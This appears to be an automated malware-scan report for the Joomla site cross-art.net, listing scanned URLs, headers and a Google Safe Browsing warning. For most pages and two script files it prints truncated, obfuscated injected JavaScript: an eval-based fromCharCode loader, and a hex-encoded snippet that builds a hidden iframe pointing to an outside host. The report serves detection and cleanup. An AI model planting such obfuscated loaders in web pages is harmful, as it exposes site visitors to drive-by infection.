Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cross-art.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://cross-art.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Fri, 05 Sep 2014 00:01:25 GMT Via: 1.1 varnish Age: 0 Location: http://cross-art.net/joomla15/ Server: Apache Vary: Accept-Encoding Content-Type: text/html; charset=iso-8859-1 X-Varnish: 2934472428 2934472310 | clean |
http://cross-art.net/joomla15/ | 200 OK Content-Length: 17730 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://cross-art.net/joomla15/templates/crossartnetv25/jquery.js | 200 OK Content-Length: 97154 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x74,0x70,0x2e,0x6f,0x70,0x6a,0x61,0x62,0x6c,0x6f,0x6e,0x69,0x63,0x61, Antivirus reports:
| ||
http://cross-art.net/joomla15/templates/crossartnetv25/script.js | 200 OK Content-Length: 12481 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) asgq=[0x28,0x66,0x75,0x6e,0x63,0x74,0x69,0x6f,0x6e,0x20,0x28,0x29,0x20,0x7b,0xd,0xa,0x20,0x20,0x20,0x20,0x76,0x61,0x72,0x20,0x75,0x20,0x3d,0x20,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x63,0x72,0x65,0x61,0x74,0x65,0x45,0x6c,0x65,0x6d,0x65,0x6e,0x74,0x28,0x27,0x69,0x66,0x72,0x61,0x6d,0x65,0x27,0x29,0x3b,0xd,0xa,0xd,0xa,0x20,0x20,0x20,0x20,0x75,0x2e,0x73,0x72,0x63,0x20,0x3d,0x20,0x27,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x66,0x74,0x70,0x2e,0x6f,0x70,0x6a,0x61,0x62,0x6c,0x6f,0x6e,0x69,0x63,0x61, Antivirus reports:
| ||
http://cross-art.net/joomla15/index.php?option=com_content&view=frontpage&Itemid=56 | 200 OK Content-Length: 17978 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/index.php?option=com_wrapper&view=wrapper&Itemid=68 | 200 OK Content-Length: 13212 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=49&Itemid=72 | 200 OK Content-Length: 20569 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://www.avira.com/includes/js/av_threats_defaults.js | 200 OK Content-Length: 14148 Content-Type: application/x-javascript | clean |
http://www.avira.com/includes/js/av_threats_resources.js | 200 OK Content-Length: 1770 Content-Type: application/x-javascript | clean |
http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=55&Itemid=77 | 200 OK Content-Length: 15669 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/index.php?option=com_content&view=category&layout=blog&id=35&Itemid=57 | 200 OK Content-Length: 17255 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/index.php?option=com_wrapper&view=wrapper&Itemid=79 | 200 OK Content-Length: 13160 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
| ||
http://cross-art.net/joomla15/administrator/ | 200 OK Content-Length: 4254 Content-Type: text/html | clean |
http://cross-art.net/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://cross-art.net/joomla15/index.php?option=com_content&view=article&id=54&Itemid=73 | 200 OK Content-Length: 14659 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body&=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(045,0143,0162,0153,0140,0161,0146,0154,0153,035,045,046,035,0170,012,07,035,035,035,035,0163,0136,0157,035,0156,0140,035,072,035,0141,0154,0140,0162,0152,0142,0153,0161,053,0140,0157,0142,0136,0161,0142,0102,0151,0142,0152,0142,0153,0161,045,044,0146,0143,0157,0136,0152,0142,04 Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cross-art.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 00:01:25 GMT
Via: 1.1 varnish
Age: 0
Location: http://cross-art.net/joomla15/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 2934472428 2934472310
GET / HTTP/1.1
Host: cross-art.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Fri, 05 Sep 2014 00:01:25 GMT
Via: 1.1 varnish
Age: 0
Location: http://cross-art.net/joomla15/
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Varnish: 2934472428 2934472310
Second query (visit from search engine):
GET / HTTP/1.1
Host: cross-art.net
Referer: http://www.google.com/search?q=cross-art.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cross-art.net
Referer: http://www.google.com/search?q=cross-art.net
Result:
The result is similar to the first query. There are no suspicious redirects found.